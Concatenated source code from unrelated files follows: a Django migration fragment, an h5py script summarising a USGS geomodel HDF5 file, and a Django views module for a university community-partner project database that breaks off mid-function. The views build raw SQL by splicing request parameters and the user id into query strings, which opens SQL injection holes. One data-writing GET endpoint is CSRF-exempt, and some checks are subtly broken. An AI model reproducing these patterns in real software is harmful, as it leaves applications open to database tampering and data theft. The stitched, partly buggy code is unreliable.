"Refusée"), ("cancelled", "Annulée"), ], default="new", max_length=150, verbose_name="État", ), ), ] import numpy import h5py import json h5 = h5py.File("data/geomodelgrids/USGS_SFCVM_detailed_v21-1.h5", "r") auxiliary = json.loads(h5.attrs["auxiliary"]) fault_blocks = sorted(auxiliary["fault_block_ids"].items(), key=lambda x: x[1]) print("Fault Blocks") for label, value in fault_blocks: lines = [ " ", " ", f" {value}", f" {label}", " Producer-defined", " ", " ", ] print("\n".join(lines)) zones = sorted(auxiliary["zone_ids"].items(), key=lambda x: x[1]) print("Zone Ids") for label, value in zones: lines = [ " ", " ", f" {value}", f" {label}", " Producer-defined", " ", " ", ] print("\n".join(lines)) for 
surface in h5["surfaces"]: dset = h5["surfaces"][surface][:] value_min = numpy.min(dset) value_max = numpy.max(dset) print(f"{surface} min={value_min:.1f} max={value_max:.1f}") value_ranges = {} for block in h5["blocks"]: dset = h5["blocks"][block] for index in range(5): value_name = h5.attrs["data_values"][index] value = dset[:,:,:,index].ravel() mask = value > -1.0e+8 value_min = numpy.min(value[mask]) value_max = numpy.max(value[mask]) value_nodata = True if numpy.sum(~mask) > 0 else False if not value_name in value_ranges: value_ranges[value_name] = (value_min, value_max, value_nodata) else: current_min, current_max, current_nodata = value_ranges[value_name] new_min = min(value_min, current_min) new_max = max(value_max, current_max) new_nodata = value_nodata or current_nodata value_ranges[value_name] = (new_min, new_max, new_nodata) for value_name, (value_min, value_max, value_nodata) in value_ranges.items(): print(f"{value_name} min={value_min:.1f} max={value_max:.1f}, nodata={value_nodata}") uno-isqa-8950/uno-cpi10-100 from decimal import * from django.db import connection from django.http import HttpResponse, HttpResponseRedirect, JsonResponse from numpy import shape import home from django.views.decorators.csrf import csrf_exempt from home.decorators import communitypartner_required, campuspartner_required, admin_required from home.views import gmaps from partners.views import district, countyData from projects.models import * from home.models import * from home.filters import * from partners.models import * from university.models import Course from .forms import ProjectCommunityPartnerForm, CourseForm, ProjectFormAdd, AddSubCategoryForm from django.contrib.auth.decorators import login_required from .models import Project,ProjectMission, ProjectCommunityPartner, ProjectCampusPartner, Status ,EngagementType, ActivityType, ProjectSubCategory from .forms import ProjectForm, ProjectMissionForm, ScndProjectMissionFormset, K12ChoiceForm, CecPartChoiceForm, OommCecPartChoiceForm from django.shortcuts import render, redirect, get_object_or_404 , get_list_or_404 from django.utils import timezone from .forms import ProjectMissionFormset,AddProjectCommunityPartnerForm, AddProjectCampusPartnerForm,ProjectForm2, ProjectMissionEditFormset from django.forms import inlineformset_factory, modelformset_factory from .filters import SearchProjectFilter import googlemaps from shapely.geometry import shape, Point import pandas as pd import json from django.db.models import Sum import datetime from django.conf import settings from googlemaps import Client # The imports below are for running sql queries for AllProjects Page from django.db import connection from UnoCPI import sqlfiles from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger sql=sqlfiles gmaps = Client(key=settings.GOOGLE_MAPS_API_KEY) @login_required() @communitypartner_required() def communitypartnerhome(request): usertype = User.objects.get(is_communitypartner=True) # if usertype.is_communitypartner == True: return render(request, 'community_partner_home.html', {'communitypartnerhome': communitypartnerhome,'usertype':usertype}) @login_required() def myProjects(request): projects_list=[] data_definition=DataDefinition.objects.all() #camp_part_user = CampusPartnerUser.objects.filter(user_id = request.user.id) #camp_part_id = camp_part_user.values_list('campus_partner_id', flat=True) #proj_camp = ProjectCampusPartner.objects.filter(campus_partner__in=camp_part_id) #project_ids = [project.project_name_id for project in 
proj_camp] getProjectIds = "select distinct project.id \ from \ projects_project as project, \ projects_projectcampuspartner as projectcampus \ where \ projectcampus.campus_partner_id in \ (select pc.id from partners_campuspartner pc, partners_campuspartneruser as cu \ where pc.id = cu.campus_partner_id \ and cu.user_id = "+str(request.user.id)+" \ ) \ and projectcampus.project_name_id = project.id" cursor = connection.cursor() #print('getProjectIds---',getProjectIds) cursor.execute(getProjectIds) projectIdResult = cursor.fetchall() project_ids = [obj[0] for obj in projectIdResult] #print('project_ids---',project_ids) cursor.execute(sql.my_projects, [project_ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[20], "pk":obj[19] , "end_semester": obj[21], "end_academic_year": obj[22], "sub_category": obj[23], "campus_lead_staff": obj[24], "mission_image": obj[25], "other_activity_type": obj[26], "other_sub_category":obj[27]}) cursor.close() return render(request, 'projects/myProjects.html', {'project': projects_list, 'data_definition':data_definition}) @login_required() def communitypartnerproject(request): projects_list = [] data_definition = DataDefinition.objects.all() # Get the campus partner id's related to the user comm_part_user = CommunityPartnerUser.objects.filter(user_id=request.user.id) comm_part_id = comm_part_user.values_list('community_partner_id', flat=True) proj_comm = ProjectCommunityPartner.objects.filter(community_partner__in=comm_part_id) project_ids = [project.project_name_id for project in proj_comm] cursor = connection.cursor() cursor.execute(sql.my_projects, [project_ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18]}) return render(request, 'projects/community_partner_projects.html', {'project': projects_list,'data_definition':data_definition}) def ajax_load_project(request): name = request.GET.get('name') project_year = request.GET.get('year') projectnameandyear = name+': '+ project_year data = { 'is_taken': Project.objects.filter(project_name__icontains=projectnameandyear).exists() } return JsonResponse(data) @login_required @csrf_exempt def saveProjectAndRegister(request): projectId = request.GET.get('projectId') name = request.GET.get('name') description = request.GET.get('description') engagement_type = request.GET.get('engagement_type') activity_type = request.GET.get('activity_type') start_semester = request.GET.get('start_semester') start_academic_yr = request.GET.get('start_academic_yr') end_semester = request.GET.get('end_semester') end_academic_yr = 
request.GET.get('end_academic_yr') uno_students = request.GET.get('uno_students') uno_students_hrs = request.GET.get('uno_students_hrs') k12_students = request.GET.get('k12_students') k12_students_hrs = request.GET.get('k12_students_hrs') k12_involvment_flag = request.GET.get('k12_involvment_flag') comm_list = request.GET.get('selectedCommIds') campus_list = request.GET.get('selectedCampusIds') project_type = request.GET.get('project_type') lead_staff_list = request.GET.get('lead_staff_list') k12_flag_value = False year_in_project_name = '' if k12_involvment_flag == 'on': k12_flag_value = True if projectId is not None: project = Project.objects.get(id=projectId) else: project = Project(project_name=name) project.description=description project.semester=start_semester project.end_semester=end_semester project.total_uno_students=uno_students project.total_uno_hours=uno_students_hrs project.k12_flag=k12_flag_value project.total_k12_students=k12_students project.total_k12_hours=k12_students_hrs project.project_type=project_type if start_academic_yr != '' and start_academic_yr is not None: project.academic_year = AcademicYear.objects.get(id=start_academic_yr) year_in_project_naame = project.academic_year if end_academic_yr != '' and end_academic_yr is not None: project.end_academic_year = AcademicYear.objects.get(id=end_academic_yr) if engagement_type != '' and engagement_type is not None: project.engagement_type = EngagementType.objects.get(id=engagement_type) if activity_type != '' and activity_type != '0' and activity_type is not None: project.activity_type = ActivityType.objects.get(id=activity_type) if lead_staff_list != '' and lead_staff_list is not None: lead_name_list = [] if lead_staff_list.find(",") != -1: leadName_list =lead_staff_list.split(",") for leadName in leadName_list: lead_name_list.append(leadName) else: lead_name_list.append(lead_staff_list) project.campus_lead_staff = lead_name_list project.status = Status.objects.get(name='Drafts') project.save() projectId = project.pk project.project_name = name + ": " + str(year_in_project_naame) + " (" + str(projectId) + ")" project.save() if comm_list != '' or comm_list is not None: if comm_list.find(",") != -1: comm_Id_list =comm_list.split(",") else: comm_Id_list = comm_list for commId in comm_Id_list: comm_obj = CommunityPartner.objects.get(id=commId) proj_obj = Project.objects.get(id=projectId) projComm = ProjectCommunityPartner(project_name=proj_obj,community_partner=comm_obj) projComm.save() if campus_list != '' or campus_list is not None: if campus_list.find(",") != -1: camp_id_list =campus_list.split(",") else: camp_id_list = campus_list for campId in camp_id_list: camp_obj = CampusPartner.objects.get(id=campId) proj_obj = Project.objects.get(id=projectId) projCamp_obj = ProjectCampusPartner(project_name=proj_obj,campus_partner=camp_obj) projCamp_obj.save() data = {'save_projectId' : projectId} return JsonResponse(data) def saveFocusArea(request): selectedfocusarea = request.GET.get('focusarea') projectid = request.GET.get('projectId') print('selectedfocusarea--',selectedfocusarea) try: test = ProjectMission.objects.get(project_name_id=projectid, mission_type='Primary') except ProjectMission.DoesNotExist: test = None if test is not None: cursor = connection.cursor() cursor.execute(sqlfiles.editproj_updateprimarymission(str(selectedfocusarea), str(projectid)), params=None) else: cursor = connection.cursor() cursor.execute(sqlfiles.editproj_addprimarymission(str(selectedfocusarea), str(projectid)), params=None) data = 
{'projectid' : projectid} return JsonResponse(data) def getEngagemetActivityList(request): selectedEngagement = request.GET.get('selectedEngagement') activityList = [] if selectedEngagement is not None: engagementObj = EngagementType.objects.get(name=selectedEngagement) eng_act_obj = EngagementActivityType.objects.all().filter(EngagementTypeName=engagementObj) for act in eng_act_obj: actObj = ActivityType.objects.get(name=act.ActivityTypeName) activityList.append( {"name": actObj.name, "id": actObj.id}) data = {'activityList' : activityList} return JsonResponse(data) @login_required() def createProject(request): mission_details = modelformset_factory(ProjectMission, form=ProjectMissionFormset) # secondary_mission_details = modelformset_factory(ProjectMission, extra=1, form=ScndProjectMissionFormset) sub_category = modelformset_factory(ProjectSubCategory, extra=1, form=AddSubCategoryForm) proj_comm_part = modelformset_factory(ProjectCommunityPartner, extra=1, form=AddProjectCommunityPartnerForm) proj_campus_part = modelformset_factory(ProjectCampusPartner, extra=1, form=AddProjectCampusPartnerForm) data_definition = DataDefinition.objects.all() # Populate project name-Parimita request.POST.get('id_project_name') # if request.method == 'POST' and 'submit' in request.POST: if request.method == 'POST': project = ProjectFormAdd(request.POST) course = CourseForm(request.POST) categoryformset = sub_category(request.POST or None, prefix='sub_category') formset = mission_details(request.POST or None, prefix='mission') # formset4 = secondary_mission_details(request.POST or None, prefix='secondary_mission') formset2 = proj_comm_part(request.POST or None, prefix='community') formset3 = proj_campus_part(request.POST or None, prefix='campus') if project.is_valid() and formset.is_valid() and course.is_valid() and formset2.is_valid() and formset3.is_valid() and categoryformset.is_valid(): if request.POST.get('k12_flag'): project.k12_flag = True else: project.k12_flag = False proj = project.save() project_name = proj.project_name.strip() proj.project_name = project_name + ": " + str(proj.academic_year) + " (" + str(proj.id) + ")" eng = str(proj.engagement_type) address = proj.address_line1 stat = str(proj.status) if stat == 'Drafts': proj.save() mission_form = formset.save(commit=False) # secondary_mission_form = formset4.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_comm_form = formset2.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() subcategory = str(cat.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() for mission in rows: id = str(mission[0]) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(proj.id)), params=None) for form in mission_form: form.project_name = proj form.mission_type = 'Primary' form.save() init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() proj.save() # return render(request, 'projects/draftadd_done.html', {'project': projects_list}) return HttpResponseRedirect('/draft-project-done') elif stat == 'Active': proj.save() if (address != 'N/A' and address != ''): # check if a community partner's address is there try: fulladdress = proj.address_line1 + ' ' + proj.city geocode_result = gmaps.geocode(fulladdress) # get the coordinates proj.latitude = 
geocode_result[0]['geometry']['location']['lat'] proj.longitude = geocode_result[0]['geometry']['location']['lng'] #### checking lat and long are incorrect if (proj.latitude == '0') or (proj.longitude == '0'): proj.save() proj.save() coord = Point([proj.longitude, proj.latitude]) for i in range(len(district)): # iterate through a list of district polygons property = district[i] polygon = shape(property['geometry']) # get the polygons if polygon.contains(coord): # check if a partner is in a polygon proj.legislative_district = property["id"] # assign the district number to a partner proj.save() for m in range(len(countyData)): # iterate through the County Geojson properties2 = countyData[m] polygon = shape(properties2['geometry']) # get the polygon if polygon.contains(coord): # check if the partner in question belongs to a polygon proj.county = properties2['properties']['NAME'] proj.median_household_income = properties2['properties']['Income'] proj.save() except: proj.save() mission_form = formset.save(commit=False) # secondary_mission_form = formset4.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_comm_form = formset2.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() subcategory = str(cat.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() for mission in rows: id = str(mission[0]) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(proj.id)), params=None) for form in mission_form: form.project_name = proj form.mission_type = 'Primary' form.save() init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() proj.save() # return render(request, 'projects/adminconfirmAddProject.html', {'project': projects_list}) if request.user.is_superuser == True: return HttpResponseRedirect('/adminsubmit_project_done') else: return HttpResponseRedirect('/submit-project-done') else: month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year) + "-" + str(year + 1)[-2:] else: a_year = str(year - 1) + "-" + str(year)[-2:] # test = AcademicYear.objects.get(academic_year=a_year) # project =ProjectFormAdd(initial={"academic_year":test}) try: test = AcademicYear.objects.get(academic_year=a_year) except AcademicYear.DoesNotExist: test = None if test is not None: project = ProjectFormAdd(initial={"academic_year": test}) else: project = ProjectFormAdd() course = CourseForm() formset = mission_details(queryset=ProjectMission.objects.none(), prefix='mission') # formset4 = secondary_mission_details(queryset=ProjectMission.objects.none(), prefix='secondary_mission') categoryformset = sub_category(queryset=ProjectSubCategory.objects.none(), prefix='sub_category') formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none(), prefix='community') formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none(), prefix='campus') return render(request, 'projects/createProject.html', {'project': project, 'formset': formset, 'formset3': formset3, 'course': course, 'data_definition': data_definition, 'formset2': formset2, 'categoryformset': categoryformset}) @login_required() def editProject(request, pk): project_mission = ProjectMissionEditFormset() proj_comm_part_edit = inlineformset_factory(Project, ProjectCommunityPartner, extra=0, min_num=1, can_delete=True, 
form=AddProjectCommunityPartnerForm) proj_campus_part_edit = inlineformset_factory(Project, ProjectCampusPartner, extra=0, min_num=1, can_delete=True, form=AddProjectCampusPartnerForm) sub_category_edit = inlineformset_factory(Project, ProjectSubCategory, extra=0, min_num=1, can_delete=True, form=AddSubCategoryForm) data_definition = DataDefinition.objects.all() if request.method == 'POST': # cache.clear() proj_edit = Project.objects.filter(id=pk) # projectName = request.POST['projectName'].strip() # p = request.POST # focus_area = request.GET['id_mission_area'] # print(focus_area) for x in proj_edit: project = ProjectFormAdd(request.POST or None, instance=x) course = CourseForm(request.POST or None, instance=x) formset_comm_details = proj_comm_part_edit(request.POST or None, request.FILES, instance=x, prefix='community_edit') formset_camp_details = proj_campus_part_edit(request.POST or None, request.FILES, instance=x, prefix='campus_edit') formset_subcatdetails = sub_category_edit(request.POST or None, request.FILES, instance=x, prefix='sub_category_edit') if project.is_valid() and formset_camp_details.is_valid() and formset_comm_details.is_valid() and formset_subcatdetails.is_valid(): instances = project.save() instances.project_name = instances.project_name.split(":")[0] + ": " + str( instances.academic_year) + " (" + pk + ")" stat = str(instances.status) if stat == 'Drafts': instances.save() compar = formset_comm_details.save() campar = formset_camp_details.save() subcat = formset_subcatdetails.save() # focus_areas = focusarea['id_mission'] # focus_areas = request.POST.get('id_mission_area',None) # print(focus_areas) # for k in pm: # k.project_name = instances # k.save() for p in compar: p.project_name = instances p.save() for l in campar: l.project_name = instances l.save() for sc in subcat: sc.project_name = instances sc.save() subcategory = str(sc.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() # print(rows[0]) # projmission = projectmission.save() for mission in rows: id = str(mission[0]) # print(id) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(pk)), params=None) #return HttpResponseRedirect("/myDrafts") return HttpResponseRedirect('/draft-project-done') else: address = instances.address_line1 if (address != 'N/A' and address != ''): # check if a community partner's address is there instances.address_update_flag = 'True' try: fulladdress = instances.address_line1 + ' ' + instances.city geocode_result = gmaps.geocode(fulladdress) # get the coordinates instances.latitude = geocode_result[0]['geometry']['location']['lat'] instances.longitude = geocode_result[0]['geometry']['location']['lng'] #### checking lat and long are incorrect if (instances.latitude == '0') or (instances.longitude == '0'): instances.save() instances.save() coord = Point([instances.longitude, instances.latitude]) for i in range(len(district)): # iterate through a list of district polygons property = district[i] polygon = shape(property['geometry']) # get the polygons if polygon.contains(coord): # check if a partner is in a polygon instances.legislative_district = property["id"] # assign the district number to a partner instances.save() for m in range(len(countyData)): # iterate through the County Geojson properties2 = countyData[m] polygon = shape(properties2['geometry']) # get the polygon if polygon.contains(coord): # check if the partner in question belongs to a polygon 
instances.county = properties2['properties']['NAME'] instances.median_household_income = properties2['properties']['Income'] instances.save() except: instances.save() instances.save() # pm = formset_missiondetails.save() compar = formset_comm_details.save() campar = formset_camp_details.save() subcat = formset_subcatdetails.save() # for k in pm: # k.project_name = instances # k.save() for p in compar: p.project_name = instances p.save() for l in campar: l.project_name = instances l.save() for sc in subcat: sc.project_name = instances sc.save() subcategory = str(sc.sub_category); cursor = connection.cursor() cursor.execute(sqlfiles.createproj_othermission(subcategory), params=None) rows = cursor.fetchall() # print(rows[0]) # projmission = projectmission.save() for mission in rows: id = str(mission[0]) # print(id) cursor = connection.cursor() cursor.execute(sqlfiles.createproj_addothermission(id, str(pk)), params=None) if request.user.is_superuser == True: #return HttpResponseRedirect('/allProjects') return HttpResponseRedirect('/adminsubmit_project_done') else: #return HttpResponseRedirect('/myProjects') return HttpResponseRedirect('/submit-project-done') else: proj_edit = Project.objects.get(id=pk) engagementObj = proj_edit.engagement_type selectedActivity = proj_edit.activity_type eng_act_obj = EngagementActivityType.objects.all().filter(EngagementTypeName=engagementObj) activityList = [] for act in eng_act_obj: actObj = ActivityType.objects.get(name=act.ActivityTypeName) # activityList.append({"name": actObj.name, "id": actObj.id}) if str(actObj.name)== str(selectedActivity): selected = 'selected' activityList.append({"name": actObj.name, "id": actObj.id, "selected":selected}) else: activityList.append({"name": actObj.name, "id": actObj.id}) # for x in proj_edit: x = proj_edit project = ProjectForm2(request.POST or None, instance=x) course = CourseForm(instance=x) project_mission = ProjectMissionEditFormset() project_all_missions = MissionArea.objects.all() # mission_areas = [] # for miss in project_all_missions: # print('missions-----', miss) # mission_areas.append({"name": miss.mission_name, "id": miss.id}) # print(mission_areas) try: test = ProjectMission.objects.get(project_name_id=pk,mission_type = 'Primary') except ProjectMission.DoesNotExist: test = None if test is not None: proj_mission = ProjectMission.objects.get(project_name_id=pk,mission_type = 'Primary') else: proj_mission = 'none' # print(proj_mission) mission_areas = [] for miss in project_all_missions: # print(miss.mission_name) if miss.mission_name == str(proj_mission): selected = 'selected' mission_areas.append({"name": miss.mission_name, "id": miss.id,'selected':selected}) else: mission_areas.append({"name": miss.mission_name, "id": miss.id}) # print(mission_areas) # selectedMisson = proj_mission.mission_id proj_comm_part = ProjectCommunityPartner.objects.filter(project_name_id=pk) proj_camp_part = ProjectCampusPartner.objects.filter(project_name_id=pk) # course_details = course(instance= x) # formset_missiondetails = mission_edit_details(instance=x, prefix='mission_edit') formset_comm_details = proj_comm_part_edit(instance=x, prefix='community_edit') formset_camp_details = proj_campus_part_edit(instance=x, prefix='campus_edit') formset_subcat_details = sub_category_edit(instance=x, prefix='sub_category_edit') return render(request, 'projects/editProject.html', {'project': project, 'course': course, 'project_mission':project_mission, 'mission_areas':mission_areas, # 'formset_missiondetails': formset_missiondetails, 
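# Hedged sketch (illustrative, not the original code): the Drafts and Active branches of both
# createProject and editProject repeat the block that attaches saved formset rows to the project
# and links "other mission" rows per sub-category. A shared helper in this spirit is possible; it
# assumes the existing `connection` and the sqlfiles.createproj_othermission /
# createproj_addothermission SQL builders already used above. The name `attach_related` is made up.
def attach_related(project, community_rows, campus_rows, subcategory_rows):
    for row in community_rows:
        row.project_name = project
        row.save()
    for row in campus_rows:
        row.project_name = project
        row.save()
    for row in subcategory_rows:
        row.project_name = project
        row.save()
        with connection.cursor() as cursor:
            cursor.execute(sqlfiles.createproj_othermission(str(row.sub_category)), params=None)
            for mission in cursor.fetchall():
                cursor.execute(sqlfiles.createproj_addothermission(str(mission[0]), str(project.id)), params=None)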
'formset_comm_details': formset_comm_details, 'formset_camp_details': formset_camp_details, 'formset_subcat_details': formset_subcat_details, 'projectId': pk, 'activityList': activityList, 'selectedActivity': selectedActivity, 'selectedMission':proj_mission, 'data_definition':data_definition}) @login_required() def showAllProjects(request): selectedprojectId = request.GET.get('proj_id_list', None) data_definition=DataDefinition.objects.all() missions = ProjectMissionFilter(request.GET, queryset=ProjectMission.objects.filter(mission_type='Primary')) status_draft = Status.objects.filter(name='Drafts') project_filter = ProjectFilter(request.GET, queryset=Project.objects.all().exclude(status__in=status_draft)) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) campusPartners = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) # campus_filtered_ids = campusPartners.qs.values_list('id', flat=True) # campus_filtered_ids = [campus.id for campus in campusPartners.qs] # campus_project_filter = ProjectCampusFilter(request.GET, queryset=ProjectCampusPartner.objects.filter( # campus_partner_id__in=campus_filtered_ids)) projects_list=[] cursor = connection.cursor() k12_selection = request.GET.get('k12_flag', None) # k12_init_selection = "All" # if k12_selection is None: # k12_selection = k12_init_selection k12_choices = K12ChoiceForm(initial={'k12_choice': k12_selection}) engagement_type_filter = request.GET.get('engagement_type', None) if engagement_type_filter is None or engagement_type_filter == "All" or engagement_type_filter == '': eng_type_cond = '%' else: eng_type_cond = engagement_type_filter mission_type_filter = request.GET.get('mission', None) if mission_type_filter is None or mission_type_filter == "All" or mission_type_filter == '': mission_type_cond = '%' else: mission_type_cond = mission_type_filter community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": 
academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name !='Drafts' and \ ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= "+ str(academic_end_year_cond)+")) " clause_query = "" if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + 
campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag ='" + K12_filter_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '"+ cec_camp_part_cond +"')" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " #cursor.execute(sql.all_projects_sql, params) cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "("+str(selectedprojectId)+")" cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) #cursor.execute(sql.search_projects_sql,project_name_list) # else: # # cursor.execute(sql.all_projects_sql) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27]}) cursor.close() return render(request, 'projects/allProjects.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter}) # all projects ends here @login_required() def SearchForProjectAdd(request,pk): foundProject = None names = [] for project in Project.objects.all(): names.append(project.project_name) campusUserProjectsNames = [] 